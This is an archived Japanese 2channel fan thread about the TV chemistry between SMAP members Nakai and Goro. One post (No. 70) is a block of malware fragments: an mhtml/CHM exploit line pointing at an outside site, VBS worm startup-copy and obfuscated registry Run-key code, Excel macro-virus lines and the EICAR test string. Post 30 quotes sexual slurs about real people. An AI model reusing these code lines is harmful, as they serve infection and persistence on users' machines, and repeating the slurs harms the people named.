2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

中居吾郎【3】

1 :スマ姐さん:2006/11/04(土) 08:24:18 ID:UBFkBujx
中居が吾郎で、吾郎が中居で。
ピンチも脳内戦士でキリヌケる、仮面コンビをマターリ語れ。

前スレ
中居吾郎2
http://tv8.2ch.net/test/read.cgi/smap/1126974985/

2 :スマ姐さん:2006/11/04(土) 12:30:04 ID:zwi4TFjN



3 :スマ姐さん:2006/11/04(土) 15:40:50 ID:ZXwdX94Q
中居ゴロゴロステチ

4 :あぼーん:あぼーん
あぼーん

5 :スマ姐さん:2006/11/07(火) 20:55:54 ID:YZSOHQFc
昔のライブMCで剛が「中居くんのBEST FREANDは吾郎ちゃんなんでしょ」発言詳しく知ってるねえさんいないか?

6 :スマ姐さん:2006/11/09(木) 09:20:30 ID:abA/6nK8
ビバアミのMCで聞いたよ。

7 :スマ姐さん:2006/11/10(金) 21:49:34 ID:Ch0DA/ni
キャチスマでの
え〜、吾郎ちゃん、元気でしょうかぁ〜。
え〜、吾郎ちゃんはアレですね
のいいかた中居君ぽかったなぁ

8 :あぼーん:あぼーん
あぼーん

9 :スマ姐さん:2006/11/18(土) 00:36:44 ID:JCLKAGF/
今頃なんだが、ビバアミのそのMC見たよ。
中居・剛で富士山に登った後のMCだった。
俺、剛のこと好きになったとか、ベストフレンドとか
言う中居に剛が言い放ったのが>5のセリフ。
それ聞いた吾郎が調子に乗って「僕、よく喋る人が好き。
ベスト(中居が着てた)とか着てる人が好き」って、中居に迫ってた。
中居と吾郎は、お互い苦手なタイプだろうと思ってた自分には
照れて言い返せない中居の態度が、メチャクチャ意外だった。
中居、顔が紅くなってたよ。
その後中居は、木村に話振って誤魔化してたけどね。

10 :スマ姐さん:2006/11/18(土) 10:53:32 ID:YgE6O646
「お前とは合わない」ネタをやりつつ後ろの方で
お喋りして笑ってる二人のギャップ萌え。

11 :スマ姐さん:2006/11/18(土) 19:02:05 ID:XtnCnmwx
ビバアミの頃って、家が近かった時期だよね。
雑誌に青春ドラマのような二人が載ったのもこの頃だっけ?

12 :スマ姐さん:2006/11/19(日) 22:51:16 ID:AhjfpOP0
家が近いと距離も近くなる、の法則?
そうすると最近も同じ区だと本人申告してたから近いかな?

13 :スマ姐さん :2006/11/20(月) 14:45:45 ID:ulXRUqVf
価値観が同じ人を好む人と自分に無い物を持ってる人に惹かれる人と二通りあるよね
このふたりは合わないと言いつつ気になるんじゃないかな

14 :スマ姐さん:2006/11/21(火) 00:20:10 ID:273TglW5
キックオフ二人とも可愛かった。

15 :スマ姐さん:2006/11/21(火) 01:22:06 ID:zLYycvg/
吾郎が2回目のチャンスで決めた後、中居が手でバツを
作ってダメ出ししていた。もしかして、キリヌケトオルから
はずせという指令が出ていた?

16 :スマ姐さん:2006/11/21(火) 11:45:14 ID:dLb2r2NC
ほんとにリアルにキリヌケトオルだなw
誰かスタッフが二人を見ててあのコント発案したんじゃないか?

17 :スマ姐さん:2006/11/21(火) 13:42:07 ID:7Bn6rBTg
ずっと吾郎が投げようとすっと、何かぶつぶつ言って吾郎を笑わせようとしている
中居・・・w 面白いな、ほんと。いいコンビだよ。

18 :スマ姐さん:2006/11/21(火) 18:11:37 ID:9BvFSI94
はずして欲しかったなら中居がラストになってゲームをコントロールするか
慎吾をラストにしてオチに使えばよかったのにね

19 :スマ姐さん:2006/11/22(水) 09:46:40 ID:W7BGb+4w
最後に投げるときに中居が一回ボケろって吾郎にいってたね
だから当てちゃったとき吾郎が当てちゃったみたいなリアクションになってたし
中居が手でダメだししてた

20 :スマ姐さん:2006/11/22(水) 13:38:06 ID:lXCU27ao
キックオフといえば99年くらいのバスケ時に笑いの神様ゴローが炸裂してて、
ジャンケンで本番の順番が最後になった吾郎に中居が
「笑いの神様ついてるよ〜」と言ってた。
あと跳び箱の時にいち早くリタイアした二人(吾郎は半ば強制リタイアだけどw)
が並んで保健室のベッドに座って様子を見てるのかわいかった。


21 :スマ姐さん:2006/11/22(水) 18:10:27 ID:6WAM2P0X
跳び箱は、中居の吾郎に対する無理しなくていいからな〜発言と
あいつちゃんとコントやってるよ発言もあったね。



22 :スマ姐さん:2006/11/29(水) 13:41:49 ID:kpDPZfCS
月曜はパイロットで中居にフライングパイした吾郎の大ウケに和み
今日はスマ新のぷちすまに和みましたよ(*´∀`)

23 :スマ姐さん:2006/11/29(水) 14:49:37 ID:+OYr6Ozk
ぷちすま、ホントにかわええエピなのに放送されてないよね。二人の表情が見てみたかったな。

24 :スマ姐さん:2006/11/30(木) 01:53:31 ID:OY5ndd3Y
ストスマ中居のゴルフ話
吾郎に教えてもらえばいいのに…

25 :スマ姐さん:2006/11/30(木) 18:26:26 ID:RM+3rYY9
家族ぐるみで行けばいいのに。吾郎のお母さんに
誘われたことだしさ。

26 :スマ姐さん:2006/12/05(火) 00:27:24 ID:0pdsz5pc
エンディングトークの吾郎の話を聞いてる時の
中居の顔いいなー。

27 :スマ姐さん:2006/12/08(金) 20:18:32 ID:1HzcGemh
中居真っ先に吾郎にシャンパンかけにいってるw
楽しそうだなー。

28 :スマ姐さん:2006/12/08(金) 20:35:24 ID:oFZ3IHNo
吾郎は木村とプラベで会うくらい友達みたいに仲がいいけど
中居にするみたいに頭撫でたり触ったりそういう感じはないよね。
あくまでも年上と年下みたいな兄弟みたいな感じ。
中居とはそういう年上年下関係があんまりないのが不思議。
一応あるんだけど、その割にお互いに子供扱いしてあやし合ってるというか。

吾郎は中居と剛に対して似た様な接し方してる気がする。

29 :スマ姐さん:2006/12/11(月) 05:05:59 ID:joftjr3D
映像整理してて去年のいいとも秋の祭典を久しぶりに見たけど
やっぱり好きだなこのコンビ
「ゴロちゃん巻きだってよ」
「あ、巻きね」
吾郎のアーチェリーの時の小声のやり取りがいい

30 :スマ姐さん:2006/12/11(月) 22:34:01 ID:3afd//WL
46 名前: スマ姐さん Mail: 投稿日: 2006/12/08(金) 02:16:54 ID: GObUsmut
アイドルは夢を売る商売、たかが紙切れ一枚でも中居は結婚したら 
もう夢は売れない。
中居のファンは みんながみんな
幸せな女の子ばっかりじゃあないんだよ。

49 名前: スマ姐さん Mail: sage 投稿日: 2006/12/08(金) 04:33:20 ID: bzB9Gtm3
中居は結婚したら意地でも別れないと思うよ

51 名前: スマ姐さん Mail: sage 投稿日: 2006/12/08(金) 05:17:22 ID: kNAWZFMM
早いトコくっついて、あっさり離婚して
ままごと婚とか叩かれればいいのに

74 名前: スマ姐さん Mail: sage 投稿日: 2006/12/10(日) 21:27:36 ID: 6IVjgy2S
中居が結婚したらここの住人は祝福するの?

87 名前: スマ姐さん Mail: sage 投稿日: 2006/12/04(月) 11:06:17 ID: daajFCso
まあ、中居は一度は離婚する運命なんだからヤリマン中野でいいんじゃない?
病気だけは感染されるなよw




31 :スマ姐さん:2006/12/12(火) 18:21:18 ID:qKkYpkrL
>>29
その時だっけ?
中居に緊張するから「手にぎっててもいい?」に萌(*´∀`)

32 :スマ姐さん:2006/12/12(火) 18:24:48 ID:qKkYpkrL
まちがえた…
ブス恋のときだから春祭だった

33 :スマ姐さん:2006/12/13(水) 03:46:22 ID:ODIorvMC
飛鳥の秋祭もブス恋の春祭もアーチェリーはウマーだったな

34 :スマ姐さん:2006/12/14(木) 00:09:32 ID:Fztua7Y3
あいかわらず、意地悪いな、中居
テレビ誌で、吾郎のことだけなんにも触れないの。
ここまで落とさないと、気がすまないのかね。


35 :スマ姐さん:2006/12/14(木) 00:36:11 ID:UbggA5/v
>>34
インタビューされた事全てが載ってると思うバカ発見


36 :スマ姐さん:2006/12/14(木) 12:52:00 ID:zH9TEG3M
>>34
はがき読まれてから中居の事が気になって気になって夢にまで見てるのか。
気持ち悪いんだよ。吾郎ヲタでもないくせに。

37 :スマ姐さん:2006/12/19(火) 00:20:42 ID:dfmlUAGw
玉様の二人なんか可愛かった〜!
中居ずっと「吾郎〜」って言ってなかった?
吾郎もそれ聞いて笑ってたし。
CDTVの時の二人みたいだった。

38 :スマ姐さん:2006/12/19(火) 00:41:14 ID:XdaHTpp0
ゴローイムニダ
ずっと言ってたなw萌え

39 :スマ姐さん:2006/12/23(土) 01:04:43 ID:cjDBdgYe
Mステの二人が可愛かった!
トークでも歌でも吾郎にちょっかいかけたがりな中居が良い。
やっぱこのコンビ好きだー。

40 :スマ姐さん:2006/12/23(土) 04:41:43 ID:uzAKbu1p
マーメイドプリンスって吾郎が言った後の中居の顔いいねー。
この二人よくお互いを見ながらこういう顔してる。


41 :スマ姐さん:2006/12/24(日) 23:43:55 ID:cOdwdKxe
中居的には吾郎はエロキャラなのかW

42 :スマ姐さん:2006/12/25(月) 00:51:06 ID:96cqntC9
エロキャラというより女好きキャラだろ
ライブでも脱いでる子やかわいい子のチェックが早いっていう意味で

43 :スマ姐さん:2006/12/25(月) 13:03:22 ID:cGRytPE9
明日いいともに吾郎くる(0゚・∀・)

44 :スマ姐さん:2006/12/25(月) 23:57:49 ID:cqLX8kFi
パイロットで、中居にぶつけようとして空振りする吾郎
らしすぎて萌え

45 :スマ姐さん:2006/12/26(火) 01:05:28 ID:INDkeQ4U
兄ちゃんにやられた事をしようとして失敗しちゃった弟みたいだった。
和むな〜失敗した吾郎

46 :スマ姐さん:2006/12/26(火) 02:09:12 ID:5id6MwAY
この2人めっちゃ好きだ。
絶対カメラ回ってない時に萌えがたくさんあるんだろうな。

47 :スマ姐さん:2006/12/26(火) 13:06:03 ID:nu1bwx9/
いいとも(*´∀`)

48 :スマ姐さん:2006/12/26(火) 13:12:07 ID:oCUuysSw
今日は吾郎を紹介する時のちょっとした小芝居にモエました。
あと吾郎って本当にさりげなく中居の頭ポンポンしたり、手まわしたりするよね。
それが可愛くて凄く好き。

49 :スマ姐さん:2006/12/26(火) 13:32:06 ID:0Ckb7s/U
いいとももよかったけどパイ!ロットの二人可愛いね。
前回も今回も吾郎のフライング笑ったし自分でうけちゃって笑い転げてるのも面白い。

50 :スマ姐さん:2006/12/26(火) 13:34:03 ID:IMIYzXKs
帽子の上からまぶたの辺りをぐりぐり撫でてた部分が
自分の中でモエの最高潮だた(*´∀`)


51 :スマ姐さん:2006/12/26(火) 14:20:27 ID:oJqxDB/j
パイロットで中居吾郎が隣同士の時の空気がスガー好き(*´∀`)

52 :スマ姐さん:2006/12/26(火) 14:57:58 ID:RKYfwRoh
>>50
まるでヌコにするみたいだったな

53 :スマ姐さん:2006/12/26(火) 15:52:41 ID:uryj1uPe
中居のが年上なのに吾郎とだと弟みたく見えるな(*´∀`)
はぁ〜今日は仕事が手に付かん

54 :スマ姐さん:2006/12/26(火) 15:56:38 ID:INDkeQ4U
いまさらですが>>45は「失敗した吾郎を見る
中居の顔もイイ!」と書きたかったです。
途中送信orz

55 :スマ姐さん:2006/12/26(火) 16:11:03 ID:HlKxujpD
>>53
人それぞれだろうけど自分はやっぱ吾郎のが弟に見えるなー。
お兄ちゃん相手にちょっと年上ぶってみる弟って感じがする。
あと兄弟越えて親子っぽく見えるときもよくあるw

56 :スマ姐さん:2006/12/26(火) 17:49:34 ID:uryj1uPe
>>55
なるほどね〜萌えるな(*´∀`)

57 :スマ姐さん:2006/12/26(火) 18:15:05 ID:acbgt3Hx
いいともで吾郎のしゃべり方を中居がマネしてる時の空気とかも好きだ(*´∀`)
全体的にこの二人の間に流れる空気感好き。

58 :スマ姐さん:2006/12/26(火) 18:15:16 ID:INDkeQ4U
いいとも見た、やっぱ中居吾郎大好きだ!
自分の中でいいともとうたばんとCDTVは三大
中居吾郎萌え番組だな〜

59 :スマ姐さん:2006/12/27(水) 00:39:11 ID:52+3BGBr
いいとも見てから部活に繰り出したんだけど
幸せすぎて大通りの横断歩道を赤だと気付かず渡ってしまったよ
何事も無くて良かった(ノ∀`) 

中居吾郎ありがとう

60 :スマ姐さん:2006/12/27(水) 09:17:23 ID:Wo32xW7O
>>59
いや違うだろw
気をつけないと最悪もう一生萌えれないよ

61 :スマ姐さん:2006/12/27(水) 15:01:27 ID:IZF7qa4Y
>>59 萌過ぎ注意
ってか、他人に迷惑かけたらアカンよ。
車運転してた人たち焦ったろうに。

62 :スマ姐さん:2006/12/27(水) 15:16:07 ID:wAtfOacD
今年一年いいともの中居吾郎には大変萌えさせて貰ったよ。
春祭の「触ってていい?」とかハイタッチとか
次の日のいいとものかまい具合とか
ほん怖番宣の飛行機とか髪型とか
そして〆が昨日のなでなで。いいとも、中居吾郎ありがとー!

63 :スマ姐さん:2006/12/27(水) 16:09:17 ID:kdtpSsTI
スマが二人以上いればどのコンビでも好きなんだが、
やっぱキリヌケコンビ・・ってか合宿所コンビ大好きだ。
二人って不思議な空気感だよね。
お互いのこと分からないと言いながら分かってたり、合わないといいながら
合ってたり。
一筋縄じゃいかないからこそ時たますごい爆弾的な萌えを落としてくれるんだなー
と思ってみたりします。あと無意識でやってるよな細々とした萌え仕草とか。
来年もおもしろい二人がたくさんみれるといいな。

64 :スマ姐さん:2006/12/27(水) 17:07:16 ID:Wo32xW7O
少し長めのアイコンタクト・・・なんだったんだアレ(*´∀`)

65 :スマ姐さん:2006/12/28(木) 00:50:26 ID:zwkNoxSr
愛コンタクトです

66 :スマ姐さん:2006/12/28(木) 01:36:28 ID:w5RAiC6k
>64
アイコンタクトって番組でしてたの?

67 :スマ姐さん:2006/12/28(木) 02:19:01 ID:Z78Asfsv
>>66
たぶんアレのことだろうと思うけど
いいとも所マップで、「少し長めのアイコンタクト」してたよ。
吾郎の反応を見てたのかなんなのか・・・(*´∀`)

心なしかタモさん他出演者の皆さん、二人がジャレてるの邪魔しないで見てたよね

68 :スマ姐さん:2006/12/28(木) 02:19:11 ID:wC1qhM1M
いいともでしてましたよ。
吾郎が何故か質問に中居の方を見ながら答え中居も見返してて、
マチャミが次の質問を出すまで無言でみつめあってるね。モエ。

69 :スマ姐さん:2006/12/28(木) 10:27:57 ID:62t1o8Pi
CM中2人でコソコソ話してたらしいね。観覧した人のブログに書いてた。

70 :<body onload=window()>:2006/12/28(木) 10:48:16 ID:g/UynJ2P
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

71 :スマ姐さん:2006/12/28(木) 18:29:08 ID:pq9vY5GC
中居の頭や肩をポンポンする吾郎かわゆし(*´∀`)
そしてさりげなく身長あわせてる

72 :スマ姐さん:2006/12/28(木) 19:49:37 ID:0iE/HVHC
>>71ああ、それ自分も思った。中居の隣でふっと背筋の張りを緩めて
話をよく聞こうをするような柔らかい前かがみになる。

73 :スマ姐さん:2006/12/28(木) 21:23:00 ID:9iqlV169
>>72
中居の隣の時の吾郎はそれがデフォで当たり前だと思ってたから
今までなんとも思ってなかったけど、言われてみれば萌えポイントだね。
いいとも祭典の時のこしょこしょ話といい
カメラにメインで映ってない時が一番かわええ。

74 :スマ姐さん:2006/12/28(木) 22:36:49 ID:wC1qhM1M
パイシリーズの中居吾郎好きだー
ゴロミスのパイガードが壊れた時とかも好きだったな。

75 :スマ姐さん:2006/12/28(木) 23:16:07 ID:Z78Asfsv
いいとも特大号でテレホンの吾郎ん時
小窓の中居イヤ〜な顔してたけど

ハイハイ(*´∀`)

76 :スマ姐さん:2006/12/29(金) 01:35:45 ID:aIx0qBqo
>>75 なんかワロタw
カメラも頑なに中居をおってたね。

77 :スマ姐さん:2006/12/29(金) 13:27:47 ID:/cj1+rhh
1/1の元旦SPのパイロット、吾郎イナス(´・ω・`)

78 :スマ姐さん:2006/12/30(土) 00:04:52 ID:JlGKqAwq
>>77 イナイネー(´・ω・`)

パイロットの二人はホント素で遊んでてカバエーんだよな
吾郎が笑いが止まらなかったの、見ててこっちも楽しかったぁ

79 :スマ姐さん:2006/12/30(土) 00:09:48 ID:aDJbHr91
吾郎と中居は固定だと思い込んでて気がつかなかった。
吾郎いないのか(´・ω・`)

80 :スマ姐さん:2006/12/30(土) 00:38:47 ID:9u86i5Ty
新年一発目からちょっと悲シス、吾郎→中居並びは固定なのに〜
変わりと言っては何だけどキリヌケトオルの新作を作成しなされ!スマスマスタッフ!

81 :スマ姐さん:2006/12/30(土) 08:56:33 ID:jqzrgkHp
ゲストはナイナイだからお笑い芸人以上に中居吾郎が面白いと困るからあえて吾郎を外したと思ってみる(*´∀`)


82 :スマ姐さん:2006/12/30(土) 23:55:18 ID:JlGKqAwq
吾郎出た日のいいとも増刊号は年明けにちゃんと見れるよね?
すがー楽しみなんだよ

83 :スマ姐さん:2006/12/31(日) 10:25:40 ID:nX39s/ct
モノマネとかの総集編もあるだろうから割くうかもだけど
多分大丈夫だべ。
CM中の様子カモーン!

84 :スマ姐さん:2006/12/31(日) 22:33:15 ID:A7GbT0Db
腰を何回も支えるようにする中居イイ(*´∀`) 来年も中居吾郎期待してるぞ。

85 :スマ姐さん:2007/01/01(月) 01:42:58 ID:LW0oY2ja
>>84 姐さん素早いな!
うちのバアチャンも二人見ながら「こんな孫達がおったらな」
って言ってたよ。かわいい二人だった。

86 :スマ姐さん:2007/01/02(火) 00:14:42 ID:ydKnl7zy
合宿所話キタね(*´∀`)

87 :スマ姐さん:2007/01/02(火) 00:48:00 ID:0kcnVIGT
中居だと思って起こしたら吾郎だったなんて、
いったいどういう状況だったんだ…
中居の部屋で吾郎が寝てたのか?
中居と吾郎は相部屋じゃなかったよな…部屋間違えただけか?

88 :スマ姐さん:2007/01/02(火) 01:21:08 ID:+UqJWMPL
相部屋だった時期もあったような気もするけど勘違いかも。
でも合宿所出てた時って言ってたから誰がどの部屋にいるのかわからなかったんだろう。


89 :スマ姐さん:2007/01/02(火) 02:22:39 ID:OMwftYRz
ラーメンの話のときも何度も吾郎ちゃん吾郎ちゃん言ってて(*´∀`)
そういや最近吾郎ちゃん呼びが多くなったと思うのは気のせいか?
あと紅白での中居が吾郎に腰に手を置いてるとこもつぼ。紹介してたとき

90 :スマ姐さん:2007/01/02(火) 03:32:57 ID:6hH5Oj8A
新年一発目から中居吾郎ゴチでした(*´∀`)

91 :スマ姐さん:2007/01/02(火) 03:37:31 ID:guVxerHf
マイクスタンド取りに行く所もプチ萌え

92 :スマ姐さん:2007/01/02(火) 13:13:57 ID:pxPk+NTp
マッチ曲?の時の吾郎ソロでの後ろ中居の2ショ(*´∀`)

93 :スマ姐さん:2007/01/02(火) 15:55:23 ID:4N4tDGC6
吾郎が「じれったいね、今夜」と間違えていった時の
中居、さらには少年隊の皆さんのかもし出す雰囲気が好き。
もっと萌えどころたくさんあったはずだが
個人的にすごくツボだった。
この二人、何気な会話がホントおもしろい。

94 :スマ姐さん:2007/01/03(水) 01:33:00 ID:LZgMOfqw
合宿話は萌えだな。
二人が「わかるわかる!」って感じで見てて楽しい。
話してる本人達も楽しそう。

95 :スマ姐さん:2007/01/03(水) 01:50:07 ID:vg8jMnjM
前ぴったんこカンカンで聞いた時は中居だけだと思ったけど
吾郎もいたんだね>ヤングハンバーグ

でも見ててリアルに(*´∀`)な顔してたよおれ

96 :スマ姐さん:2007/01/04(木) 00:41:07 ID:uYgvZgXB
中居の番組に吾郎ゲストは昔から何度かあったけど
吾郎の番組に中居ゲストってないよね?一回見てみたいなー。
中居がメンバーの番組のゲストって事自体がレアだから
あれだけど、ゴローズバーとか出て欲しい。
前にキャチスマで中居が「ゴローズバー1回しか見たこと
無いけどゲストによってテンションかえるのはよくないと思う」
みたいなこと言って、吾郎が「1回しか見てないのに分かるんですね、
本当は見ててくれてるんですね」
ってな風に言ってた時すごい萌えたよ。
どんなツンデレだ、中居w
でも中居inゴローズバーって一番想像つかないな(´∀`;)


97 :スマ姐さん:2007/01/04(木) 01:50:05 ID:e7NYLN+7
昔はメンバーが新番組にレギュラーで出るってなると、
中居は心配で堪らんのか、よく乱入みたいな事してたよな。
吾郎のWINとかさ。
まだ吾郎がスカしたキャラだった頃だから、
絡み方が今とは全然違ったけど。

98 :スマ姐さん:2007/01/04(木) 19:23:09 ID:/CWM2BHK
今日いいとも増刊号があったの忘れてた
ここが盛り上がってないところを見ると、吾郎が出た時のはなかった?

>>96 ツンデレワラタ

99 :スマ姐さん:2007/01/04(木) 21:27:24 ID:2zCTC3kK
>>98
今日のいいともは特大号の総集編&裏側だから7日の増刊号をチェック

100 :スマ姐さん:2007/01/04(木) 23:28:47 ID:/CWM2BHK
>>99
蟻がd!7日は要チェキだな(*´∀`)

101 :スマ姐さん:2007/01/05(金) 01:21:15 ID:Jb122r2o
増刊号楽しみ!CM中が流れるといいな。

>97 昔の絡みも結構好きだったりな。
キャラを作ってるわりに思わずお互い素が出ちゃったり。


102 :スマ姐さん:2007/01/05(金) 13:58:12 ID:4A+DkMot
お互いオーナー同士(*´∀`)

103 :スマ姐さん:2007/01/07(日) 11:42:36 ID:JMCeJe3h
いいとも金曜の分しか放送しなかった…

104 :スマ姐さん:2007/01/07(日) 11:46:24 ID:RmWHASGT
録りそこねた火曜日分がなかったぁぁぁ
あんまりだぁぁぁ

105 :スマ姐さん:2007/01/07(日) 20:35:46 ID:ggPTZCJ1
いいともなんでやねんいいとも

106 :スマ姐さん:2007/01/11(木) 14:37:45 ID:SkEOT/NO
(゚ー゚)>それはGoro's Barでやってください

ちょいモエ

107 :スマ姐さん:2007/01/16(火) 00:43:08 ID:utRL/HOV
中居の器に対して
「ちゃんとしてる〜!」
と叫ぶ吾郎がかわいい(*´∀`)

108 :スマ姐さん:2007/01/18(木) 00:06:00 ID:Dh87f6Jm
中居も吾郎の作品を手にとってじっくり見てたね。
しかし「ちゃんとしてる」ってどんなんだと思ったんだw

109 :スマ姐さん:2007/01/18(木) 01:16:46 ID:XuAV3RPe
中居は吾郎のお皿見て「すげーーーっ」って叫んでたね。
その後「かっけーかっけー」って小声で言ってるのも中居かな?

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)